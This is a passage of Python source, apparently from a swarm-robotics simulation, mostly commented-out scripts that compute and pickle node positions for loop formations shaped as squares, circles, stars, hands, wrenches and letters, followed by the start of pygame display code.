# y = y + 1.0 / math.sqrt(2)
# node_poses[8] = np.array([x,y])
# for i in range(9,16):
# y = y + 1.0
# node_poses[i] = np.array([x,y])
# # top side line
# for i in range(16,23):
# x = x - 1.0
# node_poses[i] = np.array([x,y])
# # left side line
# x = x - 1.0 / math.sqrt(2)
# y = y - 1.0 / math.sqrt(2)
# node_poses[23] = np.array([x,y])
# for i in range(24,30):
# y = y - 1.0
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-square #####
# filename = '100-square'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# x = 0.0
# y = 0.0
# # bottom side line
# node_poses[0] = np.array([0.0, 0.0])
# for i in range(1,26):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# # right line line
# for i in range(26,51):
# y = y + 1.0
# node_poses[i] = np.array([x,y])
# # top side line
# for i in range(51,76):
# x = x - 1.0
# node_poses[i] = np.array([x,y])
# # left side line
# for i in range(76,100):
# y = y - 1.0
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-circle #####
# filename = '30-circle'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# center = np.zeros(2)
# radius = 0.5 / math.sin(math.pi/swarm_size)
# # first node starting from left most position
# for i in range(swarm_size):
# ori = -math.pi + 2*math.pi/swarm_size * i
# node_poses[i] = center + np.array([radius*math.cos(ori), radius*math.sin(ori)])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-circle #####
# filename = '100-circle'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# center = np.zeros(2)
# radius = 0.5 / math.sin(math.pi/swarm_size)
# # first node starting from left most position
# for i in range(swarm_size):
# ori = -math.pi + 2*math.pi/swarm_size * i
# node_poses[i] = center + np.array([radius*math.cos(ori), radius*math.sin(ori)])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-triangle #####
# filename = '30-triangle'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# # first node is at bottom left corner
# x = 0.0
# y = 0.0
# node_poses[0] = np.array([x,y])
# for i in range(1,11):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# for i in range(11,21):
# x = x + 1.0 * math.cos(math.pi*2/3)
# y = y + 1.0 * math.sin(math.pi*2/3)
# node_poses[i] = np.array([x,y])
# for i in range(21, 30):
# x = x + 1.0 * math.cos(-math.pi*2/3)
# y = y + 1.0 * math.sin(-math.pi*2/3)
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-triangle #####
# filename = '100-triangle'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# side_angle = math.acos(17.0/33.0)
# # first node is at bottom left corner
# x = 0.0
# y = 0.0
# node_poses[0] = np.array([x,y])
# for i in range(1,35):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# for i in range(35,68):
# x = x + 1.0 * math.cos(math.pi-side_angle)
# y = y + 1.0 * math.sin(math.pi-side_angle)
# node_poses[i] = np.array([x,y])
# for i in range(68, 100):
# x = x + 1.0 * math.cos(-math.pi+side_angle)
# y = y + 1.0 * math.sin(-math.pi+side_angle)
# node_poses[i] = np.array([x,y])
# print("node_poses: {}".format(node_poses))
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-star #####
# filename = '30-star'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# outer_angle = 2*math.pi / 5.0
# devia_right = outer_angle
# devia_left = 2*outer_angle
# # first node is at bottom left corner
# heading_angle = outer_angle / 2.0 # current heading
# heading_dir = 0 # current heading direction: 0 for left, 1 for right
# seg_count = 0 # current segment count
# for i in range(1,swarm_size):
# node_poses[i] = (node_poses[i-1] +
# np.array([math.cos(heading_angle), math.sin(heading_angle)]))
# seg_count = seg_count + 1
# if seg_count == 3:
# seg_count = 0
# if heading_dir == 0:
# heading_angle = reset_radian(heading_angle - devia_right)
# heading_dir = 1
# else:
# heading_angle = reset_radian(heading_angle + devia_left)
# heading_dir = 0
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-star #####
# filename = '100-star'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# outer_angle = 2*math.pi / 5.0
# devia_right = outer_angle
# devia_left = 2*outer_angle
# # first node is at bottom left corner
# heading_angle = outer_angle / 2.0 # current heading
# heading_dir = 0 # current heading direction: 0 for left, 1 for right
# seg_count = 0 # current segment count
# for i in range(1,swarm_size):
# node_poses[i] = (node_poses[i-1] +
# np.array([math.cos(heading_angle), math.sin(heading_angle)]))
# seg_count = seg_count + 1
# if seg_count == 10:
# seg_count = 0
# if heading_dir == 0:
# heading_angle = reset_radian(heading_angle - devia_right)
# heading_dir = 1
# else:
# heading_angle = reset_radian(heading_angle + devia_left)
# heading_dir = 0
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-airplane #####
# filename = '30-airplane'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# # first node is at bottom center
# node_index = 0 # current sitting node
# heading_angle = - (14.0*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (130.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (42.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle - (94.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (106.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (55.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle - (35.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # half the airplane constructed, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-airplane #####
# filename = '100-airplane'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# # first node is at bottom center
# node_index = 0 # current sitting node
# heading_angle = - (18.0*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = reset_radian(heading_angle + (135.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle - (42.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(heading_angle - (94.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 9)
# heading_angle = reset_radian(heading_angle + (106.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle + (55.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 12)
# heading_angle = reset_radian(heading_angle - (40.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# # half the airplane constructed, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-cross #####
# filename = '30-cross'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-cross #####
# filename = '100-cross'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 17)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 16)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-hand #####
# filename = '30-hand'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (20.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (20.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (55.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# # small finger
# heading_angle = reset_radian(heading_angle - (15.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# # middle finger(no ring finger)
# heading_angle = reset_radian(heading_angle - (147.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # index finger
# heading_angle = reset_radian(heading_angle - (147.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # thumb
# heading_angle = reset_radian(heading_angle - (125.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (85.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-hand #####
# filename = '100-hand'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = reset_radian(heading_angle + (45.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (35.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# # small finger
# heading_angle = reset_radian(heading_angle - (15.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # ring finger
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # middle finger
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # index finger
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (44.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = reset_radian(heading_angle - (10.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # thumb
# heading_angle = reset_radian(heading_angle - (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (80.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (40.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 9)
# heading_angle = reset_radian(heading_angle + (20.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-wrench #####
# filename = '30-wrench'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-wrench #####
# filename = '100-wrench'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 20)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle + (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (90.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(heading_angle - (50.0*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-goblet #####
# filename = '30-goblet'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# arc_angle = 10.8 # default 11.25 deg
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = reset_radian(heading_angle + (135*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (30*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = (arc_angle*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-goblet #####
# filename = '100-goblet'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# arc_angle = 4.1
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = (120*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = -(arc_angle*math.pi)/180.0
# for _ in range(10):
# heading_angle = reset_radian(heading_angle + (2*arc_angle*math.pi)/180.0)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-lamp #####
# filename = '30-lamp'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = (132*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = ((180-15)*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = (110*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,15):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-lamp #####
# filename = '100-lamp'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = (100*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = (140*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = (160*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = (175*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 7)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = (110*math.pi)/180.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 15)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# # half the wrench is finished, mirror the next half
# axis_vect = node_poses[node_index] - node_poses[0]
# axis_vect = axis_vect / np.linalg.norm(axis_vect)
# for i in range(1,50):
# old_vect = node_poses[i] - node_poses[0]
# node_poses[-i] = 2*np.dot(axis_vect, old_vect)*axis_vect - old_vect
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 30-K #####
# filename = '30-K'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# angle_up = (50*math.pi)/180.0
# angle_down = -(50*math.pi)/180.0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = angle_down
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(angle_down + math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = reset_radian(angle_down + math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = reset_radian(angle_up - math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 2)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 1)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
# ##### script to generate 100-K #####
# filename = '100-K'
# swarm_size = 100
# node_poses = np.zeros((swarm_size, 2))
# node_index = 0
# angle_up = (49*math.pi)/180.0
# angle_down = -(49*math.pi)/180.0
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 6)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 3)
# heading_angle = angle_down
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = 0.0
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(angle_down + math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 14)
# heading_angle = angle_up
# node_index = cal_next_node(node_poses, node_index, heading_angle, 11)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 5)
# heading_angle = reset_radian(angle_up - math.pi)
# node_index = cal_next_node(node_poses, node_index, heading_angle, 10)
# heading_angle = math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 8)
# heading_angle = -math.pi
# node_index = cal_next_node(node_poses, node_index, heading_angle, 4)
# heading_angle = -math.pi/2
# node_index = cal_next_node(node_poses, node_index, heading_angle, 19)
# print(node_index)
# print(node_poses)
# with open(filename, 'w') as f:
# pickle.dump(node_poses, f)
pygame.init()
# find the right world and screen sizes
x_max, y_max = np.max(node_poses, axis=0)
x_min, y_min = np.min(node_poses, axis=0)
pixel_per_length = 30
world_size = (x_max - x_min + 2.0, y_max - y_min + 2.0)
screen_size = (int(world_size[0])*pixel_per_length, int(world_size[1])*pixel_per_length)
# convert node poses in the world to disp poses on screen
def cal_disp_poses():
poses_temp = np.zeros((swarm_size, 2))
# shift the loop to the middle of the world
middle = np.array([(x_max+x_min)/2.0, (y_max+y_min)/2.0])
for i in range(swarm_size):
poses_temp[i] = (node_poses[i] - middle +
